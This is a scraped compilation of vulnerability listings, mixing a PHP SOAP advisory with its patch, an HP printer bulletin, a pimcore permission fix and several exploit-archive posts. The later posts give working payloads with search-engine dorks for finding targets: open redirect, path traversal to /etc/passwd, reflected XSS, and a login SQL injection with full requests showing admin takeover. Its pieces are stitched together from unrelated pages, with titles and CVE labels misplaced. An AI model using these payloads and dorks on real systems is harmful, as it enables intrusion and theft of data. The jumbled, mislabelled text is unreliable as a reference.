A vulnerability classified as problematic has been found in DedeBIZ 6.2.10. Affected is an unknown function of the file /admin/sys_sql_query.php. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-235188. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

CVE-2023-3837

In PHP versions 8.0.* before 8.0.29, 8.1.* before 8.1.20, 8.2.* before 8.2.7 when using SOAP HTTP Digest Authentication, random value generator was not checked for failure, and was using narrower range of values than it should have. In case of random generator failure, it could lead to a disclosure of 31 bits of uninitialized memory from the client to the server, and it also made easier to a malicious server to guess the client's nonce. 



**This report was co-authored by @TimWolla**

**Summary**

The random byte generation function used in the SOAP HTTP Digest authentication code is not checked for failure. This can result in a stack information leak. Furthermore, there's an insufficient number of random bytes used.

**Details**

Context:

php\_random\_bytes\_throw(&nonce, sizeof(nonce));

nonce &= 0x7fffffff;

PHP\_MD5Init(&md5ctx);

snprintf(cnonce, sizeof(cnonce), ZEND\_LONG\_FMT, nonce);

PHP\_MD5Update(&md5ctx, (unsigned char\*)cnonce, strlen(cnonce));

PHP\_MD5Final(hash, &md5ctx);

make\_digest(cnonce, hash);

If php_random_bytes_throw fails, the nonce will be uninitialized, but  
still sent to the server. The client nonce is intended to protect  
against a malicious server. See section 5.10 and 5.12 of RFC 7616,  
and bullet point 2 below.

Tim pointed out that even though it's the MD5 of the nonce that gets sent,  
enumerating 31 bits is trivial. So we have still a stack information leak  
of 31 bits.

Furthermore, Tim found the following issues:

*   The small size of cnonce might cause the server to erroneously reject  
    a request due to a repeated (cnonce, nc) pair. As per the birthday  
    problem 31 bits of randomness will return a duplication with 50%  
    chance after less than 55000 requests and nc always starts counting at 1.
    
*   The cnonce is intended to protect the client and password against a  
    malicious server that returns a constant server nonce where the server  
    precomputed a rainbow table between passwords and correct client response.  
    As storage is fairly cheap, a server could precompute the client responses  
    for (a subset of) client nonces and still have a chance of reversing the  
    client response with the same probability as the cnonce duplication.
    
    Precomputing the rainbow table for all 2^31 cnonces increases the rainbow  
    table size by factor 2 billion, which is infeasible. But precomputing it  
    for 2^14 cnonces only increases the table size by factor 16k and the server  
    would still have a 10% chance of successfully reversing a password with a  
    single client request.
    

**PoC**

We do not have a proof-of-concept.

**Impact**

The weak randomness affects applications that use SOAP with HTTP Digest authentication against a possibly malicious server over HTTP. The stack information leak applies to both HTTP and HTTPS, but is only a few bytes.

**Proposed patch**

This patch fixes the issues by increasing the nonce size, and checking  
the return value of php\_random\_bytes\_throw(). In the process we also get  
rid of the MD5 hashing of the nonce.

From f26fcd3a152a5c6b2d140cb35a5040671696f6e1 Mon Sep 17 00:00:00 2001
From: Niels Dossche <7771979+nielsdos@users.noreply.github.com>
Date: Sun, 16 Apr 2023 15:05:03 +0200
Subject: \[PATCH\] Fix missing randomness check and insufficient random bytes
 for SOAP HTTP Digest
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

If php\_random\_bytes\_throw fails, the nonce will be uninitialized, but
still sent to the server. The client nonce is intended to protect
against a malicious server. See section 5.10 and 5.12 of RFC 7616 \[1\],
and bullet point 2 below.

Tim pointed out that even though it's the MD5 of the nonce that gets sent,
enumerating 31 bits is trivial. So we have still a stack information leak
of 31 bits.

Furthermore, Tim found the following issues:
\* The small size of cnonce might cause the server to erroneously reject
  a request due to a repeated (cnonce, nc) pair. As per the birthday
  problem 31 bits of randomness will return a duplication with 50%
  chance after less than 55000 requests and nc always starts counting at 1.
\* The cnonce is intended to protect the client and password against a
  malicious server that returns a constant server nonce where the server
  precomputed a rainbow table between passwords and correct client response.
  As storage is fairly cheap, a server could precompute the client responses
  for (a subset of) client nonces and still have a chance of reversing the
  client response with the same probability as the cnonce duplication.

  Precomputing the rainbow table for all 2^31 cnonces increases the rainbow
  table size by factor 2 billion, which is infeasible. But precomputing it
  for 2^14 cnonces only increases the table size by factor 16k and the server
  would still have a 10% chance of successfully reversing a password with a
  single client request.

This patch fixes the issues by increasing the nonce size, and checking
the return value of php\_random\_bytes\_throw(). In the process we also get
rid of the MD5 hashing of the nonce.

\[1\] RFC 7616: https://www.rfc-editor.org/rfc/rfc7616

Co-authored-by: Tim Düsterhus <timwolla@php.net>
\---
 ext/soap/php\_http.c | 21 +++++++++++++--------
 1 file changed, 13 insertions(+), 8 deletions(-)

diff --git a/ext/soap/php\_http.c b/ext/soap/php\_http.c
index db3c97b647..a619949c69 100644
\--- a/ext/soap/php\_http.c
+++ b/ext/soap/php\_http.c
@@ -657,18 +657,23 @@ try\_again:
 			has\_authorization = 1;
 			if (Z\_TYPE\_P(digest) == IS\_ARRAY) {
 				char          HA1\[33\], HA2\[33\], response\[33\], cnonce\[33\], nc\[9\];
\-				zend\_long     nonce;
+				unsigned char nonce\[16\];
 				PHP\_MD5\_CTX   md5ctx;
 				unsigned char hash\[16\];
 
\-				php\_random\_bytes\_throw(&nonce, sizeof(nonce));
\-				nonce &= 0x7fffffff;
+				if (UNEXPECTED(php\_random\_bytes\_throw(&nonce, sizeof(nonce)) != SUCCESS)) {
+					ZEND\_ASSERT(EG(exception));
+					php\_stream\_close(stream);
+					convert\_to\_null(Z\_CLIENT\_HTTPURL\_P(this\_ptr));
+					convert\_to\_null(Z\_CLIENT\_HTTPSOCKET\_P(this\_ptr));
+					convert\_to\_null(Z\_CLIENT\_USE\_PROXY\_P(this\_ptr));
+					smart\_str\_free(&soap\_headers\_z);
+					smart\_str\_free(&soap\_headers);
+					return FALSE;
+				}
 
\-				PHP\_MD5Init(&md5ctx);
\-				snprintf(cnonce, sizeof(cnonce), ZEND\_LONG\_FMT, nonce);
\-				PHP\_MD5Update(&md5ctx, (unsigned char\*)cnonce, strlen(cnonce));
\-				PHP\_MD5Final(hash, &md5ctx);
\-				make\_digest(cnonce, hash);
+				php\_hash\_bin2hex(cnonce, nonce, sizeof(nonce));
+				cnonce\[32\] = 0;
 
 				if ((tmp = zend\_hash\_str\_find(Z\_ARRVAL\_P(digest), "nc", sizeof("nc")-1)) != NULL &&
 					Z\_TYPE\_P(tmp) == IS\_LONG) {
\-\- 
2.40.0

CVE-2023-3247: Missing error check and insufficient random bytes in HTTP Digest authentication for SOAP

Certain HP LaserJet Pro print products are potentially vulnerable to an Elevation of Privilege and/or Information Disclosure related to a lack of authentication with certain endpoints.

**hp-concentra-wrapper-portlet**

 Actions

Certain HP LaserJet Pro print products are potentially vulnerable to an Elevation of Privilege and/or Information Disclosure related to a lack of authentication with certain endpoints.

Severity

High

HP Reference

HPSBPI03855 rev. 1

Release date

July 20, 2023

Last updated

July 20, 2023

Category

Print

Potential Security Impact

Potential Elevation of Privilege, Information Disclosure

**Relevant Common Vulnerabilities and Exposures (CVE) List**

**Reported by**: HP internal

List of CVE IDs    

CVE ID

CVSS

Severity

Vector

CVE-2023-26301

8.6

High

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L

Learn more about CVSS 3.0 base metrics, which range from 0 to 10.

PSR-2023-0105

**Resolution**

Update the printer firmware.

HP has provided an updated firmware resolution for potentially affected products listed in the table below. To obtain the updated firmware, go to the HP Customer Support - Software and Driver Downloads, and then search for your printer model.

**Affected products and firmware**

Identify the affected products in the table below.

Affected products    

Product name

Product number

Updated firmware version

HP Color LaserJet Pro 4201-4203cdn/dn/dw Printer Series

4RA87F, 5HH51A, 4RA88F, 5HH52A, 5HH53A, 4RA89A, 5HH48A, 5HH59A

6.12.1.12-202306030312 or higher

HP Color LaserJet Pro MFP 4301-4303dw/fdn/fdw Printer Series

4RA80F, 4RA81F, 4RA82F, 4RA83F, 4RA84F, 5HH72A, 5HH64F, 5HH73A, 5HH65A, 5HH66A, 5HH67A

6.12.1.12-202306030312 or higher

**Revision history**

This document has been revised according to the information below.

List of versions   

Version

Description

Date

1

Initial release

July 20, 2023

**Additional information**

Follow these links for additional information.

Third-party security patches

Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

Support

For issues about implementing the recommendations of this Security Bulletin, visit http://www.hp.com/go/contacthp to learn about your HP support options.

Report

To report a potential security vulnerability with any HP supported product, send email to: hp-security-alert@hp.com.

Subscribe

To initiate a subscription to receive future HP Security Bulletin alerts via email, visit https://h41369.www4.hp.com/alerts-signup.php?lang=en&cc=US&jumpid=hpsc\_profile.

Security bulletin archive

To view released Security Bulletins, visit https://support.hp.com/security-bulletins.

It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information.

Download HP’s security-alert PGP key

**Legal information**

System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.

HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Security Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Security Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement.

© Copyright 2023 HP Development Company, L.P.

HP Inc. (HP) shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP nor its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. "HP Inc.," "HP" and the names of HP products referenced herein are trademarks of HP Inc. or its affiliates in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.

 United States

**hp-detect-load-my-device-portlet**

 Actions

CVE-2023-26301: Certain HP LaserJet Pro print products - Potential elevation of privilege and/or information disclosure

Exposure of Sensitive Information to an Unauthorized Actor in GitHub repository pimcore/pimcore prior to 10.6.4.

**Commit**

Permalink

Browse files

Browse the repository at this point in the history

Confidential information provided to user with no permissions (#15530)

\* Fix: check user permissions

\* some optimizations

\* Restrict access to /admin/index/statics

\* remove unused

---------

Co-authored-by: dvesh3 <divesh.pahuja@pimcore.com>

*   Loading branch information

Showing **4 changed files** with **12 additions** and **1 deletion**.

*   *   *   *   ClassController.php
        *   IndexController.php
        *   SettingsController.php
    *   *   startup.js

3 changes: 3 additions & 0 deletions bundles/AdminBundle/Controller/Admin/DataObject/ClassController.php

Expand Up

@@ -91,6 +91,9 @@ public function getAssetTypesAction(Request $request)

\*/

public function getTreeAction(Request $request)

{

// we need to check objects permission for listing in pimcore.model.objecttypes ext model

$this\->checkPermission('objects');

  

$defaultIcon = '/bundles/pimcoreadmin/img/flat-color-icons/class.svg';

  

$classesList = new DataObject\\ClassDefinition\\Listing();

Expand Down

4 changes: 4 additions & 0 deletions bundles/AdminBundle/Controller/Admin/IndexController.php

Expand Up

@@ -138,6 +138,10 @@ public function indexAction(

\*/

public function statisticsAction(Request $request, Connection $db, KernelInterface $kernel)

{

if (!$request\->isXmlHttpRequest()) {

throw $this\->createAccessDeniedHttpException();

}

  

// DB

try {

$tables = $db\->fetchAllAssociative('SELECT TABLE\_NAME as name,TABLE\_ROWS as \`rows\` from information\_schema.TABLES

Expand Down

3 changes: 3 additions & 0 deletions bundles/AdminBundle/Controller/Admin/SettingsController.php

Expand Up

@@ -1069,6 +1069,9 @@ public function glossaryAction(Request $request)

\*/

public function getAvailableSitesAction(Request $request)

{

// we need to check documents permission for listing purposes in sites ext model & url-slugs

$this\->checkPermission('documents');

  

$excludeMainSite = $request\->get('excludeMainSite');

  

$sitesList = new Model\\Site\\Listing();

Expand Down

3 changes: 2 additions & 1 deletion bundles/AdminBundle/Resources/public/js/pimcore/startup.js

Expand Up

@@ -571,8 +571,9 @@ Ext.onReady(function () {

}

  

if (data.pushStatistics) {

var request \= new XMLHttpRequest();

const request \= new XMLHttpRequest();

request.open('GET', Routing.generate('pimcore\_admin\_index\_statistics'));

request.setRequestHeader('X-Requested-With', 'XMLHttpRequest');

  

request.onload \= function () {

if (this.status \>= 200 && this.status < 400) {

Expand Down

**0 comments on commit 0237527**

Please sign in to comment.

CVE-2023-3819: Confidential information provided to user with no permissions (#15530) · pimcore/pimcore@0237527

WordPress Page Builder KingComposer plugin version 2.9.5 suffers from an open redirection vulnerability.

    ====================================================================================================================================| # Title     : WordPress Page Builder KingComposer 2.9.5 Open Redirect Vulnerability                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://kingcomposer.com/                                                                                          |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://packetstormsecurity.com/[+] https://example.com/wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://packetstormsecurity.com/Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

WordPress Page Builder KingComposer 2.9.5 Open Redirection

WordPress ChurcHope Responsive Themes version 4.7.x suffers from a directory traversal vulnerability.

**WordPress ChurcHope Responsive Themes 4.7.x Directory Traversal**

Posted Jul 21, 2023

Authored by indoushka

WordPress ChurcHope Responsive Themes version 4.7.x suffers from a directory traversal vulnerability.

tags | exploit, file inclusion

SHA-256 | 5725a62c968e651e09b1218973491c6cf875301d455e111d6a9f075de9cbe5f8

Download | Favorite | View

**WordPress ChurcHope Responsive Themes 4.7.x Directory Traversal**

    ====================================================================================================================================| # Title     : WordPress - ChurcHope Responsive Themes 4.7.x Directory Traversal Vulnerability                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)                                               | | # Vendor    : http://themeforest.net/item/churchope-responsive-wordpress-theme/2708562                                           |  | # Dork      : "/wp-content/themes/churchope/lib/"                                                                                |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /wp-content/themes/churchope/lib/downloadlink.php?file=../../../../../../../../../etc/passwd[+] http://127.0.0.1/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../../../../../../etc/passwdGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,734)
*   Arbitrary (16,154)
*   BBS (2,859)
*   Bypass (1,733)
*   CGI (1,025)
*   Code Execution (7,236)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,334)
*   DoS (23,363)
*   Encryption (2,365)
*   Exploit (51,626)
*   File Inclusion (4,209)
*   File Upload (967)
*   Firewall (821)
*   Info Disclosure (2,755)
*   Intrusion Detection (890)
*   Java (3,034)
*   JavaScript (851)
*   Kernel (6,641)
*   Local (14,428)
*   Magazine (586)
*   Overflow (12,664)
*   Perl (1,423)
*   PHP (5,138)
*   Proof of Concept (2,337)
*   Protocol (3,583)
*   Python (1,531)
*   Remote (30,664)
*   Root (3,575)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,636)
*   Security Tool (7,874)
*   Shell (3,176)
*   Shellcode (1,212)
*   Sniffer (894)
*   Spoof (2,196)
*   SQL Injection (16,306)
*   TCP (2,397)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,710)
*   Web (9,621)
*   Whitepaper (3,748)
*   x86 (961)
*   XSS (17,862)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,993)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,793)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (349)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,237)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,597)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,755)
*   UNIX (9,267)
*   UnixWare (186)
*   Windows (6,565)
*   Other

WordPress ChurcHope Responsive Themes 4.7.x Directory Traversal

CMS-Bank Mellat Payment Manager version 1.0.0 suffers from a cross site scripting vulnerability.

====================================================================================================================================  
| # Title     : CMS-Bank Mellat Payment Manager v1.0.0 Xss Vulnerability                                                           |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 114.0.2 (64 bits)                                          |   
| # Vendor    : https://github.com/                                                                                                |    
| # Dork      :                                                                                                                    |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine. 

[+] Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code   
   (usually in the form of Javascript) to another user.   
    Because a browser cannot know if the script should be trusted or not, it will execute the script in the user context   
  allowing the attacker to access any cookies or session tokens retained by the browser. 

  [+] Affected items : 

    /bank/default.php   
   /bank/index.php 

   [+] The impact of this vulnerability :

   Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool a user in order to gather data   
   from them. An attacker can steal the session cookie and take over the account, impersonating the user. It is also possible to modify   
   the content of the page presented to the user. 

[+] How to fix this vulnerability :

   Your script should filter metacharacters from user input.  
   Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code   
   (usually in the form of Javascript) to another user. Because a browser cannot know if the script should be trusted or not,  
   it will execute the script in the user context allowing the attacker to access any cookies or session tokens retained by the browser. 

[+] Attack details :

    URL encoded POST input PayAdditionalData was set to 01/01/1967" onmouseover=prompt(940051) bad="  
    The input is reflected inside a tag parameter between double quotes.

   URL encoded POST input PayAmount was set to 1" onmouseover=prompt(911818) bad="  
   The input is reflected inside a tag parameter between double quotes.

   URL encoded POST input pay_from was set to 1" onmouseover=prompt(965239) bad="  
   The input is reflected inside a tag parameter between double quotes.

   URL encoded POST input pay_from1 was set to 1" onmouseover=prompt(951829) bad="  
   The input is reflected inside a tag parameter between double quotes.

   Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* shadow_00715* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * ViRuS_Ra3cH * yasMouh   |          
=======================================================================================================================================

CMS-Bank Mellat Payment Manager 1.0.0 Cross Site Scripting

CMS Supported IRF-TH version 2.0.6 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : CMS Supported IRF-TH v2.0.6 XSS Vulnerability                                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                             || # Vendor    : http://www.euroyouth.org.ua                                                                                        |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] Use payload in search box : <script>alert(/indoushka/);</script>[+] http://127.0.0.1/euroyouthorgua/en/search.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

CMS Supported IRF-TH 2.0.6 Cross Site Scripting

Wifi Soft Unibox Administration versions 3.0 and 3.1 suffer from a remote SQL injection vulnerability.

    # Exploit Title: Wifi Soft Unibox Administration 3.0 & 3.1 Login Page - Sql Injection# Google Dork: intext:"Unibox Administration 3.1", intext:"Unibox 3.0"# Date: 07/2023# Exploit Author: Ansh Jain @sudoark# Author  Contact : arkinux01@gmail.com# Vendor Homepage: https://www.wifi-soft.com/# Software Link:https://www.wifi-soft.com/products/unibox-hotspot-controller.php# Version: Unibox Administration 3.0 & 3.1# Tested on: Microsoft Windows 11# CVE : CVE-2023-34635# CVE URL : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34635The Wifi Soft Unibox Administration 3.0 and 3.1 Login Page is vulnerable toSQL Injection, which can lead to unauthorised admin access for attackers.The vulnerability occurs because of not validating or sanitising the userinput in the username field of the login page and directly sending theinput to the backend server and database.## How to ReproduceStep 1 : Visit the login page and check the version, whether it is 3.0,3.1, or not.Step 2 : Add this payload " 'or 1=1 limit 1-- - " to the username field andenter any random password.Step 3 : Fill in the captcha and hit login. After hitting login, you havebeen successfully logged in as an administrator and can see anyone's userdata, modify data, revoke access, etc.--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------### Login Request-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------Parameters: username, password, captcha, action-----------------------------------------------------------------------------------------------------------------------POST /index.php HTTP/2Host: 255.255.255.255.host.comCookie: PHPSESSID=rfds9jjjbu7jorb9kgjsko858dUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101Firefox/102.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 83Origin: https://255.255.255.255.host.comReferer: https://255.255.255.255.host.com/index.phpUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailersusername='or+1=1+limit+1--+-&password=randompassword&captcha=69199&action=Login--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------### Login Response--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------HTTP/2 302 FoundServer: nginxDate: Tue, 18 Jul 2023 13:32:14 GMTContent-Type: text/html; charset=UTF-8Location: ./dashboard/dashboardExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cache--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------### Successful Loggedin Request--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------GET /dashboard/dashboard HTTP/2Host: 255.255.255.255.host.comCookie: PHPSESSID=rfds9jjjbu7jorb9kgjsko858dUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101Firefox/102.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: https://255.255.255.255.host.com/index.phpUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailers--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------### Successful Loggedin Response--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------HTTP/2 200 OKServer: nginxDate: Tue, 18 Jul 2023 13:32:43 GMTContent-Type: text/html; charset=UTF-8Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheCache_control: private<!DOCTYPE html><html lang="en">html content</html>

Wifi Soft Unibox Administration 3.0 / 3.1 SQL Injection

CMS SAUDI SOFTECH version 5.0.2 suffers from a remote SQL injection vulnerability.

    =========================================================================================| # Title     : CMS SAUDI SOFTECH v5.0.2 Sql injection Vulnerability                    || # Author    : indoushka                                                               || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)  || # Vendor    : http://www.saudisoftech.com/                                            |  | # Dork      : intext:"DESIGNED BY: SAUDI SOFTECH (MST)"                               |=========================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] Login :  /panel/[+] http://127.0.0.1/ihabeccom/page.php?id=48 <==== inject herGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Tag

#php